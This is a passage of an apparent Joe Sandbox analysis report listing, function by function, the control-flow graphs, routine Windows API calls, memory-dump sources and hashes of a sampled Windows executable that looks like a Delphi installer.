                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A4620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1580766901-2767913252
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cfc1acdfd4e85ff2d131a9f4d40f785a7290ab9aa4a67b06bd919a79267a8431
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 147b0fd3ac44816fa50e213e98ef70cab9cb63b371fef283777c7ccc396f8742
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfc1acdfd4e85ff2d131a9f4d40f785a7290ab9aa4a67b06bd919a79267a8431
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB112EB06142409AC740FF76A94265A7BE1DB64318F40843FF448EB2D1DB7D99448B5F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00423A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 697 423a94-423aa2 698 423b20-423b23 697->698 699 423aa4-423aa8 697->699 700 423aaa-423ac4 EnumWindows 699->700 701 423b1d 699->701 700->701 702 423ac6-423ae3 GetWindow GetWindowLongA 700->702 701->698 703 423ae5 702->703 704 423aec-423af6 702->704 703->704 704->701 705 423af8-423b1b call 40b44c SetWindowPos 704->705 705->701
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                                                                                                                                                                                                                                                                                                  • GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$EnumLongWindows
                                                                                                                                                                                                                                                                                                                                                                  • String ID: lAB
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4191631535-3476862382
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5f05c18b5ef50282e2e62587cef3ede3e0bfa46b8e8bdba155623c697b582535
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 20c146af1fa2ebf8fe73d6cd857ce812a249192cdefe4c29475ac4fba41381ea
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f05c18b5ef50282e2e62587cef3ede3e0bfa46b8e8bdba155623c697b582535
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E115E70700610ABDB109F28DD85F6A77E8EB04725F50026AF9A49B2E7C378ED40CB59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0041F490 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 708 41f490-41f4be GetClassInfoA 709 41f4c0-41f4c8 708->709 710 41f4ca-41f4cc 708->710 709->710 711 41f4e9-41f52a call 406300 call 41f3d4 SetWindowLongA 709->711 712 41f4df-41f4e4 RegisterClassA 710->712 713 41f4ce-41f4da UnregisterClassA 710->713 712->711 713->712
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
                                                                                                                                                                                                                                                                                                                                                                  • UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
                                                                                                                                                                                                                                                                                                                                                                  • RegisterClassA.USER32(00499598), ref: 0041F4E4
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4025006896-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 575281f95dda3a69aca1950cac6a73e91d2be75231f5eec9ab3eb47dabfb38e9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e8d232a05c88a2160d81946a52d6ac90de0a8bd7e5396313334bc6410d622602
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 575281f95dda3a69aca1950cac6a73e91d2be75231f5eec9ab3eb47dabfb38e9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B011B722401047BDA10EB6DED81E9B3799D719314B11413BBA15E72A1D7369C154BAC
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004230D8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                                                                                                                                                                                                                                                                                                  • EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: A4620A480A570EnumFonts
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 178811091-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00498578 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498586), ref: 0040334B
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498586), ref: 00403356
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498590), ref: 0040633A
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498590), ref: 0040637E
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409B88: 6F9E1CD0.COMCTL32(0049859A), ref: 00409B88
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419050: GetVersion.KERNEL32(004985AE), ref: 00419050
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044F754: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004985C2), ref: 0044F78F
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044F754: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F795
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044FBFC: GetVersionExA.KERNEL32(0049B790,004985C7), ref: 0044FC0B
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004531DC: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 004531FC
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004531DC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453202
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004531DC: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 00453216
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004531DC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045321C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00456EEC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F10
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00464960: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00464960: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0046D098: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046D0AD
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00478B3C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004985F4), ref: 00478B42
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00495584: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049559D
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000000,0049863C), ref: 0049860E
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00498338: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498618,00000001,00000000,0049863C), ref: 00498342
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00498338: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498348
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005,00000000,0049863C), ref: 0049866F
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00482050: SetActiveWindow.USER32(?), ref: 004820FE
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Setup
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 504348408-3839654196
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0b193bc7ab6d0367c14efa4071f6efbf19235d44a4c70119fe87f529ba434d3c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d131c851e578025af209eb9e9c2d0e6aaf1cfb04eb4cc82699b843ce611002a7
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b193bc7ab6d0367c14efa4071f6efbf19235d44a4c70119fe87f529ba434d3c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C31D4702046409ED601BBBBED5352E3B98EB8A718B61487FF804D6553CE3D6C148A3E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00456EEC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00456E7C: CoInitialize.OLE32(00000000), ref: 00456E82
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F10
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2906209438-2320870614
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d06851ab321b3541b358425e64ece92a9dd3680dc6d91b0b498189b82d1e29c2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6d1f0b9ea2f83cf17b9d56af39d37ffc4890966232cc80b75afa5f9be50b51f8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d06851ab321b3541b358425e64ece92a9dd3680dc6d91b0b498189b82d1e29c2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97C04CA1B4169096CB00B7FAA54361F2414DB5075FB96C07FBD40BB687CE7D8848AA2E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0046D098 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046D0AD
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorLibraryLoadModeProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2492108670-2683653824
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 51dc9fbd693ba3a295bc392b0c44c452297184d9f94e97235de0a86cbdf211f8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 608de25eae135e4754017d8cf95b07e3007941af04aa8fd5541e4ba3120ba520
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51dc9fbd693ba3a295bc392b0c44c452297184d9f94e97235de0a86cbdf211f8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69B092E0F056008ACF00A7F6984260A10059B8071DF90807B7440BB395EA3E840AAB6F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042440C Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
                                                                                                                                                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 0042449F
                                                                                                                                                                                                                                                                                                                                                                  • DispatchMessageA.USER32(?), ref: 004244A9
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4217535847-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
